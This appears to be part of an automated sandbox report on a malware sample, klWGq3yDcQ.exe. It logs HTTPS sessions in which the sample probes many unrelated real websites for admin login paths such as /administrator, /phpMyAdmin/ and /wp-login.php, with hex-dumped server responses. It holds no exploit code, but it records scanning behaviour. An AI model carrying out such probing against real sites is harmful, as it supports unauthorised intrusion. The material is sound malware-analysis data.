                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://www.gatewaytoearlylearning.com/administrator
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1123INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 38 20 47 4d 54 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 70 75 62 6c 69 73 68 65 64 73 69 74 65 2d 78 73 72 66
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCache-Control: no-cache, privateDate: Sun, 26 Nov 2023 05:59:38 GMTSet-Cookie: publishedsite-xsrf
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC607INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 75 62 6c 69 73 68 65 64 53 69 74 65 53 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 64 50 63 57 6c 77 65 48 46 61 59 6d 70 59 64 46 5a 6b 52 57 4e 69 4d 7a 4a 51 53 55 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 64 45 6f 78 52 48 4d 33 4e 45 74 46 59 7a 4a 46 59 57 52 77 54 54 42 49 5a 79 39 6b 54 7a 4a 36 4c 30 6f 7a 55 6a 4a 76 62 30 4d 34 53 6d 74 4b 56 47 35 70 55 33 63 32 63 56 56 6f 57 47 4a 46 59 6b 56 68 61 57 31 6a 51 55 78 79 56 31 6c 4d 62 56 4e 35 4e 33 68 5a 4d 58 52 77 4d 48 70 4a 4d 45 46 76 4e 7a 4a 74 51 33 70 6f 52 69 74 49 63 46 4a 6d 4e 48 56 61 4c 7a 56 6f 4f 43 74 49 65 6e 70 30 4f 53 39 70 53 57 67 77 4d 6b 78 71 51 54 64 4c 5a 57 4a 48 55 31 46 48 63 54 56 5a 4b 33 4d 33 65 58
                                                                                                                                                                                                    Data Ascii: Set-Cookie: PublishedSiteSession=eyJpdiI6ImdPcWlweHFaYmpYdFZkRWNiMzJQSUE9PSIsInZhbHVlIjoidEoxRHM3NEtFYzJFYWRwTTBIZy9kTzJ6L0ozUjJvb0M4SmtKVG5pU3c2cVVoWGJFYkVhaW1jQUxyV1lMbVN5N3hZMXRwMHpJMEFvNzJtQ3poRitIcFJmNHVaLzVoOCtIenp0OS9pSWgwMkxqQTdLZWJHU1FHcTVZK3M3eX
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1580INData Raw: 36 32 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 20 41 72 69 61 6c 2c 20 73 61
                                                                                                                                                                                                    Data Ascii: 620<!doctype html><html><head> <title>404 - Page Not Found</title> <style type="text/css"> html, body { height: 100%; margin: 0; padding: 0; font-family: Roboto, Helvetica Neue, Arial, sa


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    212192.168.2.46041572.167.58.1614436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC172OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: webstamp.ca
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC275INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 75 70 67 72 61 64 65 2d 69 6e 73 65 63 75 72 65 2d 72 65 71 75 65 73 74 73 3b 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32 63 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 55 70 67 72 61 64 65 2c 20 63 6c 6f 73 65 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e 74
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:38 GMTServer: ApacheContent-Security-Policy: upgrade-insecure-requests;Upgrade: h2,h2cConnection: Upgrade, closeAccept-Ranges: bytesVary: Accept-EncodingTransfer-Encoding: chunkedContent
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC648INData Raw: 32 37 63 0d 0a 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 4f 4f 50 53 21 20 53 6f 6d 65 74 68 69 6e 67 20 77 65 6e 74 20 77 72 6f 6e 67 2e 20 54 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 68 61 73 20 62 65 65 6e 20 0d 0a 72 65 6d 6f 76 65 64 20 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 64 65 72 20 6d 61 69 6e 74 65 6e 61 6e 63 65 2e 0d 0a 46 65 65 6c 20 66 72 65 65 20 74 6f 20 72 65 61 64 20 74 68 65 20 6d 61 6e 79 20 6f 74 68 65 72 20 61 72 74 69 63 6c 65 73 20 61 76 61 69 6c 61 62 6c 65 20 61 74 20 0d 0a 68 74 74 70 73 3a 2f 2f 77 65 62 73 74 61 6d 70 2e 63 61 0d 0a 3c 21 2d 2d 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: 27c/phpMyAdmin/OOPS! Something went wrong. The page you requested has been removed or is currently under maintenance.Feel free to read the many other articles available at https://webstamp.ca...


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    213192.168.2.46003115.236.29.1064436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC162OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: getquipu.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC358INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 39 34 36 34 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 31 34 3a 33 35 3a 30 33 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 36 35 35 66 36 33 31 37 2d 31 37 31 62 31 22 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 26 Nov 2023 05:59:38 GMTContent-Type: text/htmlContent-Length: 94641Connection: closeLast-Modified: Thu, 23 Nov 2023 14:35:03 GMTETag: "655f6317-171b1"Strict-Transport-Security: max-age=31536000; incl
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC16026INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 20 4c 61 73 74 20 50 75 62 6c 69 73 68 65 64 3a 20 54 68 75 20 4e 6f 76 20 32 33 20 32 30 32 33 20 31 34 3a 30 37 3a 33 37 20 47 4d 54 2b 30 30 30 30 20 28 43 6f 6f 72 64 69 6e 61 74 65 64 20 55 6e 69 76 65 72 73 61 6c 20 54 69 6d 65 29 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 0a 20 20 64 61 74 61 2d 77 66 2d 70 61 67 65 3d 22 36 35 35 37 39 32 66 62 30 36 30 66 34 66 34 30 65 33 37 66 62 36 62 64 22 0a 20 20 64 61 74 61 2d 77 66 2d 73 69 74 65 3d 22 36 34 30 30 63 34 39 64 66 66 34 62 34 35 38 36 34 65 38 39 36 61 34 62 22 0a 20 20 6c 61 6e 67 3d 22 65 73 22 0a 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>... Last Published: Thu Nov 23 2023 14:07:37 GMT+0000 (Coordinated Universal Time) --><html data-wf-page="655792fb060f4f40e37fb6bd" data-wf-site="6400c49dff4b45864e896a4b" lang="es"> <head> <meta charset="utf-8" /> <ti
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC16384INData Raw: 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 75 69 2d 74 65 78 74 2d 73 69 7a 65 2d 73 6d 61 6c 6c 2d 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 43 6f 6e 6f 63 65 20 65 6c 20 65 73 74 61 64 6f 20 64 65 20 74 75 20 66 61 63 74 75 72 61 63 69 c3 b3 6e 20 70 6f 72 20 63 6f 6e 74 61 63 74 6f 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: v> <div class="uui-text-size-small-2"> Conoce el estado de tu facturacin por contacto. </div> </div> </a>
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC16384INData Raw: 2f 70 65 72 73 6f 6e 61 6c 69 7a 61 72 2d 66 61 63 74 75 72 61 2e 6a 73 6f 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 6c 6f 6f 70 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 64 69 72 65 63 74 69 6f 6e 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 61 75 74 6f 70 6c 61 79 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 69 73 2d 69 78 32 2d 74 61 72 67 65 74 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 72 65 6e 64 65 72 65 72 3d 22 73 76 67 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 64 75 72 61 74 69 6f 6e
                                                                                                                                                                                                    Data Ascii: /personalizar-factura.json" data-loop="1" data-direction="1" data-autoplay="1" data-is-ix2-target="0" data-renderer="svg" data-duration
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 74 3d 22 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 69 6d 61 67 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 77 2d 6e 6f 64 65 2d 5f 35 66 38 65 31 64 33 31 2d 38 66 61 38 2d 64 35 63 31 2d 36 30 34 36 2d 30 37 62 34 31 32 34 39 33 63 37 36 2d 31 32 34 39 33 63 37 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 64 69 76 20 62 67 5f 5f 67 72 65 65 6e 5f 69 6d 61 67 65 20 66 75 6c 6c 2d 63 65 6e 74 65 72 20 72 6f 75 6e 64 65 64 5f 5f 32 30 70 78 22 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: " alt="" class="image" /> </div> <div id="w-node-_5f8e1d31-8fa8-d5c1-6046-07b412493c76-12493c71" class="div bg__green_image full-center rounded__20px"
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC16384INData Raw: 74 65 72 2d 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 49 6e 67 72 65 73 6f 73 20 79 20 67 61 73 74 6f 73 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 65 73 2f 67 65 73 74 69 6f 6e 2d 63 6f 62 72 6f 73 2d 79 2d 70 61 67 6f 73 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 20 66 6f 6f 74 65 72 2d 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 43 6f 62 72 6f 73 20 79 20 70 61 67 6f 73 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 65 73 2f 67 65 73 74 69 6f 6e 2d 63 6c 69 65 6e 74 65 73 2d 70 72 6f 76 65 65 64 6f 72 65 73 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 20 66 6f 6f 74 65 72 2d 6c 69
                                                                                                                                                                                                    Data Ascii: ter-link" >Ingresos y gastos</a > <a href="es/gestion-cobros-y-pagos" class="link footer-link" >Cobros y pagos</a > <a href="es/gestion-clientes-proveedores" class="link footer-li
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC13079INData Raw: 20 34 30 2e 38 37 34 39 20 33 33 2e 30 35 31 39 20 34 31 2e 30 37 30 35 20 33 33 2e 34 35 33 39 4c 34 31 2e 39 33 39 37 20 33 35 2e 31 39 32 34 43 34 32 2e 30 39 31 38 20 33 35 2e 34 38 35 37 20 34 32 2e 33 37 34 33 20 33 35 2e 36 34 38 37 20 34 32 2e 36 37 38 35 20 33 35 2e 36 34 38 37 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 33 33 2e 30 39 35 34 20 33 30 2e 34 32 32 35 43 33 33 2e 32 31 34 39 20 33 30 2e 34 32 32 35 20 33 33 2e 33 34 35 33 20 33 30 2e 33 39 20 33 33 2e 34 35 33 39 20 33 30
                                                                                                                                                                                                    Data Ascii: 40.8749 33.0519 41.0705 33.4539L41.9397 35.1924C42.0918 35.4857 42.3743 35.6487 42.6785 35.6487Z" fill="white" ></path> <path d="M33.0954 30.4225C33.2149 30.4225 33.3453 30.39 33.4539 30


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    214192.168.2.46028992.62.143.504436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC178OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: www.bunasta.eu
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC451INData Raw: 48 54 54 50 2f 31 2e 30 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 43 4d 53 53 45 53 53 49 44 38 30 66 39 66 64 33 66 3d 6e 39 72 30 71 36 74 66 6e 31 68 6e 65 73 68 67 6c 64 6b 30 76 36 33 6c 74 36 3b 20 70 61 74 68 3d 2f 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 45 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 32 36 20 4a 75 6c 20 31 39 39 37 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.0 404 Not FoundDate: Sun, 26 Nov 2023 05:59:38 GMTServer: Apache/2.4.38 (Debian)Set-Cookie: CMSSESSID80f9fd3f=n9r0q6tfn1hneshgldk0v63lt6; path=/; HttpOnlyExpires: Mon, 26 Jul 1997 05:00:00 GMTCache-Control: no-store, no-cache, must-revali
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC16384INData Raw: 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6c 74 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 75 73 6c 61 70 69 73 20 6e 65 72 61 73 74 61 73 20 2d 20 42 75 6e 61 73 74 61 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 75 6e 61
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="lt"><head> <meta charset="UTF-8"/> <title>Puslapis nerastas - Bunasta</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="https://www.buna
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC16384INData Raw: 6e 2d 79 3a 20 2d 38 30 70 78 3b 20 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 50 75 73 6c 61 70 69 73 20 6e 65 72 61 73 74 61 73 20 20 20 20 20 20 20 20 3c 2f 68 31 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 0a 0a 20 20 20 20 0a 20 20 20 20 3c 73 65 63 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 63 62 6e 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: n-y: -80px; "> <div class="container"> <h1> Puslapis nerastas </h1> </div></section> <section> <div class="container"> <div class="fcbn-column">
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC4056INData Raw: 70 61 6e 61 c5 a1 61 75 73 20 74 69 70 6f 20 69 6e 66 6f 72 6d 61 63 69 6a c4 85 2e c2 a0 3c 2f 70 3e 0a 3c 70 3e 54 61 69 67 69 2c 20 6b 61 64 20 c5 a1 69 6f 73 20 75 c5 be 6b 6c 61 75 73 6f 73 20 66 6f 72 6d 61 20 75 c5 be 74 69 6b 72 69 6e 74 61 69 20 76 65 69 6b 74 c5 b3 2c 20 6a c5 ab 73 20 74 75 72 69 74 65 20 70 61 c5 be 79 6d c4 97 74 69 20 e2 80 9e 53 75 74 69 6e 6b 75 20 73 75 20 6e 61 c5 a1 75 6d 6f 20 73 6c 61 70 75 6b 61 69 73 e2 80 9c 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 53 6c 61 70 75 6b c5 b3 20 6e 61 75 64 6f 6a 69 6d 6f 20 70 61 72 69 6e 6b 74 79 73 3c 2f
                                                                                                                                                                                                    Data Ascii: panaaus tipo informacij.</p><p>Taigi, kad ios uklausos forma utikrintai veikt, js turite paymti Sutinku su naumo slapukais.</p> </div> <h2>Slapuk naudojimo parinktys</


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    215192.168.2.46063347.246.24.2114436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC169OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: wonka.cc
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC733INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 30 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 39 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 41 53 50 2e 4e 45 54 5f 53 65 73 73 69 6f 6e 49 64 3d 68 72 68 32 79 66 64 72 32 63 31 61 6f 6d 72 33 6b 68 70 63 68 6e 35 34 3b 20 70 61 74 68 3d 2f 3b 20 48 74 74 70 4f 6e 6c 79 3b
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundServer: TengineContent-Type: text/html; charset=utf-8Content-Length: 103Connection: closeDate: Sun, 26 Nov 2023 05:59:39 GMTCache-Control: privateSet-Cookie: ASP.NET_SessionId=hrh2yfdr2c1aomr3khpchn54; path=/; HttpOnly;
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC103INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 6e 77 7a 69 6d 67 2e 77 65 7a 68 61 6e 2e 6e 65 74 2f 73 74 61 74 69 63 2d 6a 73 2f 70 61 67 65 34 30 34 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script src='https://nwzimg.wezhan.net/static-js/page404.js'></script>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    216192.168.2.46062915.235.14.1414436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC173OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: unaj.edu.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
